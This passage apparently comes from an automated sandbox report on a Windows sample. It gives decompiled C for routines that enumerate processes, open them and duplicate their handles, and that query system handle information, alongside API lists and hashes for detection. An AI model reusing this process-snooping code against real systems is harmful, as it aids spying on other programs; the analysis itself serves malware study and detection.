0x1001f576
0x1001f57c
0x1001f582
0x1001f588
0x1001f58e
0x1001f594
0x1001f59a
0x1001f5a4
0x1001f5b2
0x1001f5c0
0x1001f5c9
0x1001f5cf
0x1001f5e0
0x1001f5e3
0x1001f5ef

APIs

GetSystemTime.KERNEL32(?), ref: 1001F5A4
SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
__aulldiv.LIBCMT ref: 1001F5DB

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Time$System$File$__aulldiv
String ID:
API String ID: 3735792614-0
Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9

Uniqueness

Uniqueness Score: -1.00%

Function 100026D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E100026D0(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10022D98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001E70( &_v56,  &_v84);
				E1000EBEB( &_v56, 0x103307a8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x100026d3
0x100026d5
0x100026e0
0x100026e1
0x100026f3
0x100026f8
0x10002706
0x10002714
0x10002719
0x10002723
0x1000272b
0x10002735

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 10002706
__CxxThrowException@8.LIBCMT ref: 10002714

Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B

Strings

vector<T> too long, xrefs: 100026EB

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 1843230569-3788999226
Opcode ID: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
Instruction ID: 1a2e96a28b8215f22a0e790cb2dc9ca4275ca3d727c061adff09d24352fe5d00
Opcode Fuzzy Hash: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
Instruction Fuzzy Hash: 31F05876804548EBDB14DBD4DD81BEEB778FB047A0F900728F522676C4DB342A05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000442C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F00B(E10022968, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001D90(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
				E1000EBEB(_t25 - 0x50, 0x10330158);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100232c8;
				return _t23;
			}

0x1000442c
0x1000442c
0x10004433
0x10004440
0x10004445
0x10004445
0x1000444d
0x10004450
0x1000445e
0x10004465
0x1000446a
0x1000446b
0x10004470
0x10004472
0x10004477
0x10004480

APIs

__EH_prolog3.LIBCMT ref: 10004433
__CxxThrowException@8.LIBCMT ref: 10004465

Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B

Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13

Strings

invalid string position, xrefs: 10004438

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
String ID: invalid string position
API String ID: 2977319401-1799206989
Opcode ID: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
Instruction ID: a56476a32a0c337bfade56aca9773eeef8d3bbd0f37adf4676240551fddf05bf
Opcode Fuzzy Hash: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
Instruction Fuzzy Hash: 6CE09275800198EBD710DBD4EC41ADEB778EF04390F80881AF605BB20ACBB5A948CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1611970727133.exe PID: 6944 Parent PID: 6612 1611970727133.exeCOMMON

Executed Functions

Function 0040CE93, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 122
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				void _v1102;
				void* _v1104;
				intOrPtr _v1636;
				long _v1652;
				void _v1656;
				void* _v1660;
				void* __edi;
				void* __esi;
				void* _t42;
				int _t47;
				long _t50;
				void* _t51;
				void* _t57;
				struct HINSTANCE__* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t79;
				void* _t84;
				void* _t85;
				void* _t86;

				_t79 = _a4;
				_t2 = _t79 + 0x2c; // 0x40c800
				E00403F55(_t2);
				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t42;
				memset( &_v1656, 0, 0x228);
				_t85 = _t84 + 0xc;
				_v1660 = 0x22c;
				Process32FirstW(_v12,  &_v1660); // executed
				while(1) {
					_t47 = Process32NextW(_v12,  &_v1660); // executed
					if(_t47 == 0) {
						break;
					}
					E0040C997( &_v580);
					_t50 = _v1652;
					_v580 = _t50;
					_v52 = _v1636;
					_t51 = OpenProcess(0x410, 0, _t50);
					__eflags = _t51;
					_v8 = _t51;
					if(_t51 != 0) {
						L4:
						_v1104 = 0;
						memset( &_v1102, 0, 0x208);
						_t86 = _t85 + 0xc;
						E0040D049(_t79, _v8,  &_v1104);
						__eflags = _v1104;
						if(_v1104 == 0) {
							L6:
							__eflags =  *0x4136ec; // 0x1
							_v16 = 0x104;
							if(__eflags == 0) {
								_t69 = GetModuleHandleW(L"kernel32.dll");
								__eflags = _t69;
								if(_t69 != 0) {
									 *0x4136ec = 1;
									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
								}
							}
							_t57 =  *0x4136f0;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
							}
							L11:
							E0040CAF2( &_v576,  &_v1104);
							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t85 = _t86 + 0x14;
							CloseHandle(_v8);
							_t79 = _a4;
							L12:
							_t37 = _t79 + 0x2c; // 0x40c800
							E0040D0D3(_t37,  &_v580);
							continue;
						}
						__eflags = _v1104 - 0x3f;
						if(_v1104 != 0x3f) {
							goto L11;
						}
						goto L6;
					}
					_t71 = E004058FB();
					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
						goto L12;
					}
					_t72 = OpenProcess(0x1000, 0, _v580);
					__eflags = _t72;
					_v8 = _t72;
					if(_t72 == 0) {
						goto L12;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x0040ce9f
0x0040cea2
0x0040cea5
0x0040ceaf
0x0040ceb9
0x0040cec4
0x0040cec9
0x0040ced6
0x0040cee0
0x0040d022
0x0040d02c
0x0040d033
0x00000000
0x00000000
0x0040cef0
0x0040cef5
0x0040cf0e
0x0040cf14
0x0040cf17
0x0040cf19
0x0040cf1b
0x0040cf1e
0x0040cf48
0x0040cf55
0x0040cf5c
0x0040cf61
0x0040cf70
0x0040cf75
0x0040cf7c
0x0040cf88
0x0040cf88
0x0040cf8e
0x0040cf95
0x0040cf9c
0x0040cfa2
0x0040cfa4
0x0040cfac
0x0040cfbc
0x0040cfbc
0x0040cfa4
0x0040cfc1
0x0040cfc6
0x0040cfc8
0x0040cfd9
0x0040cfd9
0x0040cfdb
0x0040cfe7
0x0040cfff
0x0040d004
0x0040d00a
0x0040d010
0x0040d013
0x0040d01a
0x0040d01d
0x00000000
0x0040d01d
0x0040cf7e
0x0040cf86
0x00000000
0x00000000
0x00000000
0x0040cf86
0x0040cf20
0x0040cf25
0x0040cf29
0x00000000
0x00000000
0x0040cf3b
0x0040cf3d
0x0040cf3f
0x0040cf42
0x00000000
0x00000000
0x00000000
0x0040cf42
0x0040d046

APIs

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
memset.MSVCRT ref: 0040CEC4
Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
memset.MSVCRT ref: 0040CF5C
GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
CloseHandle.KERNEL32(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C

Strings

?, xrefs: 0040CF7E
QueryFullProcessImageNameW, xrefs: 0040CFA6
kernel32.dll, xrefs: 0040CF97

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: ?$QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1549906504
Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6FB, Relevance: 19.7, APIs: 13, Instructions: 207
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				int _v44;
				intOrPtr _v48;
				int _v52;
				char _v56;
				int _v60;
				intOrPtr _v64;
				int _v68;
				char _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				int _v100;
				void _v622;
				short _v624;
				char _v1616;
				void _v1623;
				char _v1624;
				void* __esi;
				void* _t97;
				void* _t99;
				long _t101;
				intOrPtr _t102;
				void* _t110;
				void* _t111;
				void* _t114;
				void* _t116;
				void* _t128;
				void* _t131;
				signed char* _t152;
				void* _t153;
				void** _t154;
				void*** _t155;
				intOrPtr _t158;
				signed short* _t159;
				void* _t163;
				void* _t164;
				void* _t165;

				_t165 = __eflags;
				_t155 = __eax;
				_v28 = 0;
				_v32 = 0;
				_v624 = 0;
				memset( &_v622, 0, 0x208);
				E00405800( &_v624);
				_t164 = _t163 + 0x10;
				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v12 = _t97;
				_t99 = E0040C572(_t155, _t165); // executed
				_v16 = _t99;
				FindCloseChangeNotification(_v12); // executed
				_t154 =  *_t155;
				_t101 = GetCurrentProcessId();
				if(_v16 == 0) {
					_t153 =  *_t154;
					if(_t153 > 0) {
						_t152 =  &(_t154[2]);
						do {
							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
								_v32 =  *_t152 & 0x000000ff;
							}
							_t152 =  &(_t152[0x10]);
							_t153 = _t153 - 1;
							_t170 = _t153;
						} while (_t153 != 0);
					}
				}
				_t102 = 0x20;
				_v64 = _t102;
				_v48 = _t102;
				_v72 = 0;
				_v60 = 0;
				_v68 = 0;
				_v56 = 0;
				_v44 = 0;
				_v52 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0040CE93(_t153, _t170,  &_v100); // executed
				_v20 = 0;
				if(_v44 > 0) {
					do {
						_t110 = E0040C982(_v20,  &_v56);
						_t36 = _t110 + 4; // 0x4
						_v12 = _t110;
						_t111 = E00405888(_t36);
						_t158 = _a4;
						_v16 = _t111;
						_v8 = 0;
						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
							goto L26;
						} else {
							while(1) {
								_t114 = E00406306(_t158, _v8);
								_push(_v16);
								_push(_t114);
								L0040E03E();
								if(_t114 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
									continue;
								} else {
									goto L26;
								}
								goto L27;
							}
							_t116 = OpenProcess(0x40, 0,  *_v12);
							__eflags = _t116;
							_v16 = _t116;
							if(_t116 != 0) {
								__eflags =  *_t154;
								_v24 = 0;
								if( *_t154 > 0) {
									_t159 =  &(_t154[1]);
									do {
										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
										if(( *_t159 & 0x0000ffff) !=  *_v12) {
											goto L21;
										} else {
											__eflags = (_t159[2] & 0x000000ff) - _v32;
											if((_t159[2] & 0x000000ff) != _v32) {
												goto L21;
											} else {
												_v8 = 0;
												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
												__eflags = _v8;
												if(_v8 == 0) {
													goto L21;
												} else {
													_v1624 = 0;
													memset( &_v1623, 0, 0x3e7);
													_t164 = _t164 + 0xc;
													_v36 = 0;
													E0040C41D();
													_t128 =  *0x4132a8;
													__eflags = _t128;
													if(_t128 != 0) {
														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
													}
													CloseHandle(_v8);
													_v40 = E00405888( &_v1616);
													_t131 = E00405888(_a8);
													_push(_t131);
													_push(_v40);
													L0040E03E();
													__eflags = _t131;
													if(_t131 == 0) {
														 *_a12 =  *_v12;
														_v28 = 1;
														 *_a16 = _t159[3] & 0x0000ffff;
													} else {
														goto L21;
													}
												}
											}
										}
										goto L24;
										L21:
										_v24 = _v24 + 1;
										_t159 =  &(_t159[8]);
										__eflags = _v24 -  *_t154;
									} while (_v24 <  *_t154);
								}
								L24:
								CloseHandle(_v16);
							}
							__eflags = _v28;
							if(_v28 == 0) {
								goto L26;
							}
						}
						goto L27;
						L26:
						_v20 = _v20 + 1;
					} while (_v20 < _v44);
				}
				L27:
				if(_v100 != 0) {
					FreeLibrary(_v100); // executed
					_v100 = 0;
				}
				E00403F55( &_v56);
				E00403F55( &_v72);
				return _v28;
			}

0x0040c6fb
0x0040c70e
0x0040c718
0x0040c71b
0x0040c71e
0x0040c725
0x0040c731
0x0040c736
0x0040c74c
0x0040c752
0x0040c757
0x0040c75f
0x0040c762
0x0040c768
0x0040c76a
0x0040c773
0x0040c775
0x0040c779
0x0040c77b
0x0040c77e
0x0040c784
0x0040c792
0x0040c792
0x0040c795
0x0040c798
0x0040c798
0x0040c798
0x0040c77e
0x0040c779
0x0040c79d
0x0040c79e
0x0040c7a1
0x0040c7a8
0x0040c7ab
0x0040c7ae
0x0040c7b1
0x0040c7b4
0x0040c7b7
0x0040c7ba
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c7c6
0x0040c7c9
0x0040c7cc
0x0040c7cf
0x0040c7d7
0x0040c7da
0x0040c7e0
0x0040c7e6
0x0040c7eb
0x0040c7ee
0x0040c7f1
0x0040c7f6
0x0040c7fc
0x0040c7ff
0x0040c802
0x00000000
0x0040c808
0x0040c808
0x0040c80d
0x0040c812
0x0040c815
0x0040c816
0x0040c81f
0x00000000
0x00000000
0x0040c821
0x0040c82a
0x00000000
0x0040c82c
0x00000000
0x0040c82c
0x00000000
0x0040c82a
0x0040c839
0x0040c83f
0x0040c841
0x0040c844
0x0040c84a
0x0040c84c
0x0040c84f
0x0040c855
0x0040c858
0x0040c85e
0x0040c860
0x00000000
0x0040c866
0x0040c86a
0x0040c86d
0x00000000
0x0040c873
0x0040c87f
0x0040c891
0x0040c897
0x0040c89a
0x00000000
0x0040c89c
0x0040c8a9
0x0040c8af
0x0040c8b4
0x0040c8b7
0x0040c8ba
0x0040c8bf
0x0040c8c4
0x0040c8c6
0x0040c8dd
0x0040c8dd
0x0040c8e2
0x0040c8f6
0x0040c8f9
0x0040c8fe
0x0040c8ff
0x0040c902
0x0040c907
0x0040c90b
0x0040c928
0x0040c931
0x0040c938
0x00000000
0x00000000
0x00000000
0x0040c90b
0x0040c89a
0x0040c86d
0x00000000
0x0040c90d
0x0040c90d
0x0040c913
0x0040c916
0x0040c916
0x0040c91e
0x0040c93a
0x0040c93d
0x0040c93d
0x0040c943
0x0040c946
0x00000000
0x00000000
0x0040c946
0x00000000
0x0040c948
0x0040c948
0x0040c94e
0x0040c7e0
0x0040c957
0x0040c95a
0x0040c95f
0x0040c965
0x0040c965
0x0040c96b
0x0040c973
0x0040c97f

APIs

memset.MSVCRT ref: 0040C725

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
_wcsicmp.MSVCRT ref: 0040C816
OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
memset.MSVCRT ref: 0040C8AF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
_wcsicmp.MSVCRT ref: 0040C902
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
String ID:
API String ID: 832456665-0
Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C516, Relevance: 1.5, APIs: 1, Instructions: 11
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
				signed int _t5;
				long _t7;

				_t5 =  *__eax;
				if(_t5 == 0) {
					return _t5 | 0xffffffff;
				}
				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
				return _t7;
			}

0x0040c516
0x0040c51a
0x00000000
0x0040c52e
0x0040c52a
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE98, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
				char _v4;
				char _v8;
				struct HWND__* _v12;
				void* __edi;
				void* __esi;
				void* _t42;
				struct HWND__* _t53;
				void* _t60;
				struct HWND__* _t69;
				struct HWND__* _t71;
				struct HWND__* _t76;
				int _t82;
				int _t84;
				struct HWND__* _t85;
				void* _t93;
				struct HWND__* _t107;
				struct HWND__* _t108;

				_t93 = __edx;
				_t92 = __ecx;
				E0040E340(0x27a4, __ecx);
				_t42 = E00402754(_t92);
				if(_t42 != 0) {
					E0040DA9D();
					SetErrorMode(0x8001); // executed
					 *0x412b10 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
					E0040621C( &_v4);
					_push( &_a76);
					_a36 = 0x20;
					_a28 = 0;
					_a40 = 0;
					_a32 = 0;
					_a44.hwnd = 0;
					E0040BB15(__eflags);
					_a1800 =  &_v8;
					E004064A1(_t92, __eflags,  &_v8, _a12); // executed
					_t53 = E004065C4(_a1792, L"/savelangfile");
					__eflags = _t53;
					if(_t53 < 0) {
						E00407259(); // executed
						__eflags = E004065C4(_a1800, L"/deleteregkey");
						if(__eflags < 0) {
							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
							if(__eflags <= 0) {
								L7:
								E0040BA94( &_a72);
								__eflags = _a664 - 3;
								if(_a664 != 3) {
									_push(5);
								} else {
									_push(3);
								}
								ShowWindow(_a592, ??);
								UpdateWindow(_a592);
								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
								__eflags = GetMessageW( &_a44, 0, 0, 0);
								while(__eflags != 0) {
									_t69 =  *0x412c2c; // 0x0
									__eflags = _t69;
									_t107 = _t69;
									if(_t69 == 0) {
										L14:
										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
										__eflags = _t71;
										if(_t71 == 0) {
											goto L15;
										}
									} else {
										_t85 = GetForegroundWindow();
										__eflags = _t107 - _t85;
										if(_t107 == _t85) {
											L15:
											_t108 =  *0x412c2c; // 0x0
											_v12 = _a1820;
											_t76 = IsDialogMessageW(_a592,  &_a44);
											__eflags = _t76;
											if(_t76 == 0) {
												__eflags = _t108;
												if(_t108 == 0) {
													L18:
													__eflags = _v12;
													if(_v12 == 0) {
														L20:
														TranslateMessage( &_a44);
														DispatchMessageW( &_a44);
													} else {
														_t82 = IsDialogMessageW(_v12,  &_a44);
														__eflags = _t82;
														if(_t82 == 0) {
															goto L20;
														}
													}
												} else {
													_t84 = IsDialogMessageW(_t108,  &_a44);
													__eflags = _t84;
													if(_t84 == 0) {
														goto L18;
													}
												}
											}
										} else {
											goto L14;
										}
									}
									__eflags = GetMessageW( &_a44, 0, 0, 0);
								}
							} else {
								__eflags = E0040BD40( &_a72, _t93, __eflags);
								if(__eflags == 0) {
									goto L7;
								}
							}
						}
					} else {
						 *0x4131d0 = 0x412374;
						E004073F7(_t92);
					}
					E0040BC51( &_a72, __eflags);
					E0040623E( &_v8);
					E00403F55( &_a24);
					E0040623E( &_v8);
					_t60 = 0;
					__eflags = 0;
				} else {
					_t60 = _t42 + 1;
				}
				return _t60;
			}

0x0040be98
0x0040be98
0x0040bea3
0x0040beab
0x0040beb2
0x0040beba
0x0040bec4
0x0040bed9
0x0040bee6
0x0040bef0
0x0040bef9
0x0040befa
0x0040bf02
0x0040bf06
0x0040bf0a
0x0040bf0e
0x0040bf12
0x0040bf1f
0x0040bf26
0x0040bf37
0x0040bf3c
0x0040bf3e
0x0040bf54
0x0040bf6a
0x0040bf6c
0x0040bf79
0x0040bf7d
0x0040bf90
0x0040bf94
0x0040bf99
0x0040bfa1
0x0040bfa7
0x0040bfa3
0x0040bfa3
0x0040bfa3
0x0040bfb0
0x0040bfbd
0x0040bfd1
0x0040bfe4
0x0040bfe6
0x0040bff2
0x0040bff7
0x0040bff9
0x0040bffb
0x0040c007
0x0040c01a
0x0040c020
0x0040c022
0x00000000
0x00000000
0x0040bffd
0x0040bffd
0x0040c003
0x0040c005
0x0040c024
0x0040c02b
0x0040c031
0x0040c041
0x0040c043
0x0040c045
0x0040c047
0x0040c049
0x0040c057
0x0040c057
0x0040c05b
0x0040c06c
0x0040c071
0x0040c07c
0x0040c05d
0x0040c066
0x0040c068
0x0040c06a
0x00000000
0x00000000
0x0040c06a
0x0040c04b
0x0040c051
0x0040c053
0x0040c055
0x00000000
0x00000000
0x0040c055
0x0040c049
0x00000000
0x00000000
0x00000000
0x0040c005
0x0040c090
0x0040c090
0x0040bf7f
0x0040bf88
0x0040bf8a
0x00000000
0x00000000
0x0040bf8a
0x0040bf7d
0x0040bf40
0x0040bf40
0x0040bf4a
0x0040bf4a
0x0040c09c
0x0040c0a5
0x0040c0ae
0x0040c0b7
0x0040c0bc
0x0040c0bc
0x0040beb4
0x0040beb4
0x0040beb4
0x0040c0c4

APIs

Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
